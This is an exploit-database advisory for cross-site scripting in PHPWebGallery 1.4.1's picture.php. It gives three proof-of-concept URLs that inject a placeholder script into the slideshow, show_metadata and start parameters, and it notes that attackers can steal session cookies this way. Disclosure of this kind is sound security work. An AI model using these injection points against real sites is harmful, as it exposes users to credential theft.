PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting

EDB-ID:

27588


Author:

Psych0

Type:

webapps


Platform:

PHP

Date:

2006-04-10


source: https://www.securityfocus.com/bid/17421/info
 
PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
 
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss]

http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss]

http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss]